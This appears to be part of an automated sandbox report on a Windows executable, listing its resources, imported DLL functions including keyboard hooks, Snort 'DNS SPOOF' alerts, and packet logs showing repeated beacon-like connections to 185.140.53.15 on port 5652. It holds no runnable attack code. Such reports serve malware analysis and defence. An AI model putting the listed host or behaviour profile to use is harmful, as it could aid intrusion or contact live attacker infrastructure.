                            RT_STRING0xfe3080xccdata
                            RT_STRING0xfe3d40x194data
                            RT_STRING0xfe5680x3c4data
                            RT_STRING0xfe92c0x338data
                            RT_STRING0xfec640x294data
                            RT_GROUP_CURSOR0xfeef80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef0c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef5c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_CURSOR0xfef700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                            RT_GROUP_ICON0xfef840x3edataEnglishUnited States

                            Imports

                            DLLImport
                            oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                            user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                            kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                            kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                            user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                            gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, LPtoDP, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                            version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                            kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                            advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                            oleaut32.dllGetErrorInfo, SysFreeString
                            ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                            kernel32.dllSleep
                            oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                            comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                            URLInetIsOffline

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishUnited States

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            09/27/21-20:40:26.090744UDP254DNS SPOOF query response with TTL of 1 min. and no authority53499108.8.8.8192.168.2.4
                            09/27/21-20:40:28.212397UDP254DNS SPOOF query response with TTL of 1 min. and no authority53645498.8.8.8192.168.2.4
                            09/27/21-20:40:47.445765UDP254DNS SPOOF query response with TTL of 1 min. and no authority53617218.8.8.8192.168.2.4
                            09/27/21-20:40:49.554492UDP254DNS SPOOF query response with TTL of 1 min. and no authority53512558.8.8.8192.168.2.4
                            09/27/21-20:40:52.234039UDP254DNS SPOOF query response with TTL of 1 min. and no authority53615228.8.8.8192.168.2.4
                            09/27/21-20:41:03.235649UDP254DNS SPOOF query response with TTL of 1 min. and no authority53597948.8.8.8192.168.2.4
                            09/27/21-20:41:17.924951UDP254DNS SPOOF query response with TTL of 1 min. and no authority53534188.8.8.8192.168.2.4
                            09/27/21-20:41:30.956044UDP254DNS SPOOF query response with TTL of 1 min. and no authority53512758.8.8.8192.168.2.4
                            09/27/21-20:41:33.111673UDP254DNS SPOOF query response with TTL of 1 min. and no authority53634928.8.8.8192.168.2.4
                            09/27/21-20:41:39.455292UDP254DNS SPOOF query response with TTL of 1 min. and no authority53570918.8.8.8192.168.2.4
                            09/27/21-20:41:43.690538UDP254DNS SPOOF query response with TTL of 1 min. and no authority53544508.8.8.8192.168.2.4

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 27, 2021 20:40:26.099253893 CEST497715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:26.126665115 CEST565249771185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:26.633711100 CEST497715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:26.662739038 CEST565249771185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:27.162794113 CEST497715652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:27.188055992 CEST565249771185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:28.213025093 CEST497745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:28.239039898 CEST565249774185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:28.740093946 CEST497745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:28.767437935 CEST565249774185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:29.266966105 CEST497745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:29.292431116 CEST565249774185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:30.311638117 CEST497755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:30.337019920 CEST565249775185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:30.847476959 CEST497755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:30.873163939 CEST565249775185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:31.382426977 CEST497755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:31.408561945 CEST565249775185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:32.568515062 CEST497765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:32.593892097 CEST565249776185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:33.097670078 CEST497765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:33.122795105 CEST565249776185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:33.629543066 CEST497765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:33.654998064 CEST565249776185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:35.528153896 CEST497775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:35.553522110 CEST565249777185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:36.104592085 CEST497775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:36.129878044 CEST565249777185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:36.704710960 CEST497775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:36.730668068 CEST565249777185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:37.749738932 CEST497825652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:37.775094986 CEST565249782185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:38.275748014 CEST497825652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:38.302005053 CEST565249782185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:38.806431055 CEST497825652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:38.833870888 CEST565249782185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:39.854981899 CEST497835652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:39.880990028 CEST565249783185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:40.382126093 CEST497835652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:46.383398056 CEST497835652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:46.409064054 CEST565249783185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:47.448198080 CEST497905652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:47.475070000 CEST565249790185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:47.975523949 CEST497905652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:48.000745058 CEST565249790185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:48.500801086 CEST497905652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:48.526865005 CEST565249790185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:49.562388897 CEST497925652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:49.588556051 CEST565249792185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:50.090642929 CEST497925652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:50.116292953 CEST565249792185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:50.620203018 CEST497925652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:50.645873070 CEST565249792185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:52.249577045 CEST497935652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:52.275001049 CEST565249793185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:52.867918015 CEST497935652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:52.895874977 CEST565249793185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:53.468501091 CEST497935652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:53.495196104 CEST565249793185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:54.516490936 CEST497945652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:54.542279959 CEST565249794185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:55.076044083 CEST497945652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:55.101849079 CEST565249794185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:55.676054955 CEST497945652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:55.701675892 CEST565249794185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:56.810127020 CEST497965652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:56.836287975 CEST565249796185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:57.367189884 CEST497965652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:57.392453909 CEST565249796185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:57.967570066 CEST497965652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:57.994271994 CEST565249796185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:59.016191959 CEST498095652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:59.042155027 CEST565249809185.140.53.15192.168.2.4
                            Sep 27, 2021 20:40:59.542375088 CEST498095652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:40:59.568694115 CEST565249809185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:00.069375992 CEST498095652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:00.096935987 CEST565249809185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:01.115319967 CEST498145652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:01.140680075 CEST565249814185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:01.643546104 CEST498145652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:01.668754101 CEST565249814185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:02.169558048 CEST498145652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:02.195699930 CEST565249814185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:03.238528013 CEST498185652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:03.264319897 CEST565249818185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:03.855710983 CEST498185652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:03.881481886 CEST565249818185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:04.455780983 CEST498185652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:04.481502056 CEST565249818185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:05.535041094 CEST498215652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:05.563955069 CEST565249821185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:06.155870914 CEST498215652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:06.181652069 CEST565249821185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:06.755912066 CEST498215652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:06.782246113 CEST565249821185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:07.804713011 CEST498225652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:07.830929995 CEST565249822185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:08.465043068 CEST498225652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:08.491796970 CEST565249822185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:09.067141056 CEST498225652192.168.2.4185.140.53.15

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 27, 2021 20:39:50.712766886 CEST5802853192.168.2.48.8.8.8
                            Sep 27, 2021 20:39:50.742908955 CEST53580288.8.8.8192.168.2.4
                            Sep 27, 2021 20:39:54.559814930 CEST5309753192.168.2.48.8.8.8
                            Sep 27, 2021 20:39:54.586869001 CEST53530978.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:00.329817057 CEST4925753192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:00.377412081 CEST53492578.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:01.487426043 CEST6238953192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:01.589236021 CEST53623898.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:26.069981098 CEST4991053192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:26.090744019 CEST53499108.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:26.709034920 CEST5585453192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:26.736041069 CEST53558548.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:28.191519976 CEST6454953192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:28.212397099 CEST53645498.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:30.296859026 CEST6315353192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:30.310684919 CEST53631538.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:32.554495096 CEST5299153192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:32.567531109 CEST53529918.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:35.508255959 CEST5370053192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:35.522198915 CEST53537008.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:35.778544903 CEST5172653192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:35.861727953 CEST53517268.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:36.340289116 CEST5679453192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:36.441093922 CEST53567948.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:37.736310959 CEST5653453192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:37.749092102 CEST53565348.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:39.840715885 CEST5662753192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:39.854439974 CEST53566278.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:42.579866886 CEST5662153192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:42.592500925 CEST53566218.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:42.794097900 CEST6311653192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:42.857904911 CEST53631168.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:44.545025110 CEST6407853192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:44.717713118 CEST53640788.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:46.670589924 CEST6480153192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:46.683717966 CEST53648018.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:47.422678947 CEST6172153192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:47.445765018 CEST53617218.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:49.533044100 CEST5125553192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:49.554491997 CEST53512558.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:52.200242996 CEST6152253192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:52.234039068 CEST53615228.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:54.499921083 CEST5233753192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:54.513664007 CEST53523378.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:55.821634054 CEST5504653192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:55.889620066 CEST53550468.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:56.719162941 CEST4961253192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:56.794174910 CEST4928553192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:56.808721066 CEST53492858.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:56.828322887 CEST53496128.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:57.487617016 CEST5060153192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:57.515784025 CEST53506018.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:57.897201061 CEST6087553192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:57.985850096 CEST53608758.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:58.307404041 CEST5644853192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:58.380373001 CEST53564488.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:58.864598036 CEST5917253192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:58.879224062 CEST53591728.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:58.999835014 CEST6242053192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:59.013353109 CEST53624208.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:59.997201920 CEST6057953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:00.010282040 CEST53605798.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:00.552804947 CEST5018353192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:00.629829884 CEST53501838.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:01.101335049 CEST6153153192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:01.114439011 CEST53615318.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:02.316555023 CEST4922853192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:02.329612970 CEST53492288.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:03.211925030 CEST5979453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:03.235649109 CEST53597948.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:04.239950895 CEST5591653192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:04.253524065 CEST53559168.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:04.683504105 CEST5275253192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:04.696125984 CEST53527528.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:05.504503965 CEST6054253192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:05.526628971 CEST53605428.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:07.787156105 CEST6068953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:07.801413059 CEST53606898.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:11.246792078 CEST6420653192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:11.259496927 CEST53642068.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:13.020337105 CEST5090453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:13.040038109 CEST53509048.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:13.486362934 CEST5752553192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:13.499980927 CEST53575258.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:15.690439939 CEST5381453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:15.703810930 CEST53538148.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:17.904463053 CEST5341853192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:17.924951077 CEST53534188.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:20.089129925 CEST6283353192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:20.102364063 CEST53628338.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:22.204933882 CEST5926053192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:22.218985081 CEST53592608.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:24.323244095 CEST4994453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:24.335789919 CEST53499448.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:26.440473080 CEST6330053192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:26.453758955 CEST53633008.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:28.589694023 CEST6144953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:28.603553057 CEST53614498.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:30.934642076 CEST5127553192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:30.956043959 CEST53512758.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:33.083949089 CEST6349253192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:33.111673117 CEST53634928.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:35.215830088 CEST5894553192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:35.228498936 CEST53589458.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:37.323995113 CEST6077953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:37.337399006 CEST53607798.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:38.495858908 CEST6401453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:38.526067019 CEST53640148.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:39.433008909 CEST5709153192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:39.455291986 CEST53570918.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:39.548918962 CEST5590453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:39.562026024 CEST53559048.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:41.558228970 CEST5210953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:41.570872068 CEST53521098.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:43.668311119 CEST5445053192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:43.690537930 CEST53544508.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:45.795187950 CEST4937453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:45.808367014 CEST53493748.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:48.034203053 CEST5043653192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:48.047791004 CEST53504368.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:50.154508114 CEST6260553192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:50.166790962 CEST53626058.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:52.264264107 CEST5425653192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:52.277652025 CEST53542568.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:54.373840094 CEST5218953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:54.386415005 CEST53521898.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:56.481215954 CEST5613153192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:56.493730068 CEST53561318.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:58.592732906 CEST6299253192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:58.606566906 CEST53629928.8.8.8192.168.2.4
                            Sep 27, 2021 20:42:06.596437931 CEST5443253192.168.2.48.8.8.8
                            Sep 27, 2021 20:42:06.612971067 CEST53544328.8.8.8192.168.2.4
                            Sep 27, 2021 20:42:08.715605974 CEST5722753192.168.2.48.8.8.8
                            Sep 27, 2021 20:42:08.729338884 CEST53572278.8.8.8192.168.2.4
                            Sep 27, 2021 20:42:10.826145887 CEST5838353192.168.2.48.8.8.8
                            Sep 27, 2021 20:42:10.839230061 CEST53583838.8.8.8192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
